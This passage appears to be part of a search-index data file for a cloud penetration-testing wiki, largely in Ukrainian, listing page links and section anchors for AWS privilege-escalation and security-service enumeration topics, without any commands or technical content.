cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailputinstancepublicports","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailsetresourceaccessforbucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatebucket","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatecontainerservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailupdatedomainentry","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#aws---macie-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#macie","pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc.html#amazon-macie---Обхід-перевірки-цілісності-reveal-sample","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#aws---mediapackage-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotatechannelcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#mediapackagerotateingestendpointcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#aws---mq-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mq","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqcreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqlistusers-mqupdateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.html#mqlistbrokers-mqupdatebroker","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#aws---msk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.html#msklistclusters-mskupdatesecurity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#aws---rds-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds---Служба-реляційних-баз-даних","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsmodifydbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rds-dbconnect","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#Зловживання-дозволами-ролі-rds-iam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbcluster-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdscreatedbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.html#rdsaddroletodbinstance-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#aws---redshift-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftgetclustercredentialswithiam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#redshiftdescribeclusters-redshiftmodifycluster","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#Доступ-до-зовнішніх-сервісів","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#Лямбди","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#dynamo","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#aws---route53-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.html#route53createhostedzone-route53changeresourcerecordsets-acm-pcaissuecertificate-acm-pcagetcertificate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#aws---sns-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#sns","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snspublish","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snssubscribe","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.html#snsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#aws---sqs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws---sso--identitystore-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#aws-identity-center--aws-sso","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#Скидання-пароля","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#identitystorecreategroupmembership","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoputinlinepolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachmanagedpolicytopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssoattachcustomermanagedpolicyreferencetopermissionset-ssoprovisionpermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssocreateaccountassignment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssogetrolecredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachmanagedpolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodetachcustomermanagedpolicyreferencefrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeleteinlinepolicyfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.html#ssodeletepermissionboundaryfrompermissionset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#aws---Організації-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#Організації","pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.html#Від-облікового-запису-управління-до-дочірніх-облікових-записів","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#aws---s3-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketnotification-s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putobject-s3getobject-додатково-над-файлом-стану-terraform","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3putbucketpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getbucketacl-s3putbucketacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.html#s3getobjectacl-s3putobjectversionacl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#aws---sagemaker-privesc-1","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#iampassrole--sagemakercreatenotebookinstance-sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatepresignednotebookinstanceurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreateprocessingjobiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatetrainingjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#sagemakercreatehyperparametertuningjob-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.html#Посилання","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#aws---secrets-manager-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secrets-manager","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetsecretvalue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.html#secretsmanagergetresourcepolicy-secretsmanagerputresourcepolicy-secretsmanagerlistsecrets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#aws---ssm-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmsendcommand","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmresumesession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmdescribeparameters-ssmgetparameter--ssmgetparameters","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#ssmgetcommandinvocation-ssmlistcommandinvocations--ssmlistcommands","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#aws---step-functions-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#step-functions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#task-resources","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesteststate--iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statescreatestatemachine--iampassrole--statesstartexecution--statesstartsyncexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.html#statesupdatestatemachine--не-завжди-необхідно-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#aws---sts-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#sts","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsgetfederationtoken","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithsaml","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#stsassumerolewithwebidentity","pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.html#Зловживання-федерацією","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#aws---workdocs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocscreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsgetdocument-workdocsdescribeactivities","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddresourcepermissions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.html#workdocsaddusertogroup","pentesting-cloud/aws-security/aws-services/index.html#aws---Сервіси","pentesting-cloud/aws-security/aws-services/index.html#Типи-сервісів","pentesting-cloud/aws-security/aws-services/index.html#Контейнерні-сервіси","pentesting-cloud/aws-security/aws-services/index.html#Абстрактні-сервіси","pentesting-cloud/aws-security/aws-services/index.html#Перерахування-сервісів","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/index.html#aws---Служби-безпеки-та-виявлення","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#aws---cloudtrail-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Агрегація-журналів-з-кількох-облікових-записів","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#cloudtrail-з-усіх-облікових-записів-організації-в-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Перевірка-файлів-журналів","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Логи-до-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Історія-подій","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Інсайти","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Безпека","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Консультант-доступу","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Дії","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#csv-injection","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Обхід-виявлення","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#honeytokens--обхід","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Доступ-до-третьої-інфраструктури","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Модифікація-конфігурації-cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Модифікація-конфігурації-бакету","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#ransomware-cloudtrail","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#aws---cloudwatch-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Ключові-концепції","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Простори-імен","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Метрики","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Виміри","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Статистика","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Одиниці","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Функції-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Панель-приладів","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Потік-метрик-та-дані-метрик","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Сигнал","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Виявлення-аномалій","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Правила-інсайту-та-керовані-правила-інсайту","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Журнали-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Моніторинг-та-події-cloudwatch","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Встановлення-агента","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmscloudwatchputmetricalarm--cloudwatchputcompositealarm","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletealarmactions-cloudwatchenablealarmactions-cloudwatchsetalarmstate","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteanomalydetector-cloudwatchputanomalydetector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletedashboards-cloudwatchputdashboard","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeleteinsightrules-cloudwatchputinsightrule-cloudwatchputmanagedinsightrule","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdisableinsightrules-cloudwatchenableinsightrules","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchdeletemetricstream--cloudwatchputmetricstream--cloudwatchputmetricdata","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchstopmetricstreams-cloudwatchstartmetricstreams","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#cloudwatchtagresource-cloudwatchuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws---config-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#aws-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#Функціонування","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.html#Правила-config","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#aws---control-tower-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#control-tower","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.html#post-exploitation--persistence","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#aws---cost-explorer-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#cost-explorer-та-виявлення-аномалій","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.html#Бюджети","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#aws---detective-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#detective","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#aws---firewall-manager-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#firewall-manager","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#prerequisites","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#types-of-protection-policies","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#administrator-accounts","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#Постексплуатація--Обхід-виявлення","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#organizationsdescribeorganization--fmsassociateadminaccount-fmsdisassociateadminaccount-fmsputadminaccount","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputpolicy-fmsdeletepolicy","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsbatchassociateresource-fmsbatchdisassociateresource-fmsputresourceset-fmsdeleteresourceset","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputappslist-fmsdeleteappslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputprotocolslist-fmsdeleteprotocolslist","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsputnotificationchannel-fmsdeletenotificationchannel","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmsassociatethirdpartyfirewall-fmsdisssociatethirdpartyfirewall","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#fmstagresource-fmsuntagresource","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#aws---guardduty-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Приклад-Виявлень","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Усі-Виявлення","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Багато-Облікових-Записів","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty-bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Загальні-рекомендації","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Ломання-guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Приклади-обходу-специфічних-висновків","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#inspector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-elements","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#Постексплуатація","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#aws---security-hub-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#security-hub","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#Обхід-виявлення","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#aws---shield-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#shield","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---trusted-advisor-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---trusted-advisor-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws-trusted-advisor-overview","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#notifications-and-data-refresh","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#checks-breakdown","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws-waf","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Ключові-концепції","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Ключові-функції","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Постексплуатація--Обхід","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Посилання","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#aws---api-gateway-enum","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Типи-api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Основні-компоненти-api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Логування","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Різні-авторизації-для-доступу-до-кінцевих-точок-api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Політика-ресурсів","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#iam-Авторизатор","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Підписування-запитів-за-допомогою-python","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Кастомний-авторизатор-lambda","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Необхідний-api-ключ","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Неавтентифікований-доступ","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Постексплуатація","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Постійність","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#aws---certificate-manager-acm--private-certificate-authority-pca","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#Основна-інформація","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#Перерахування","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#acm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#pcm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#privesc","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#aws---cloudformation--codestar-enum","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#cloudformation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#codestar","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc-1","pentesting-cloud/aws-s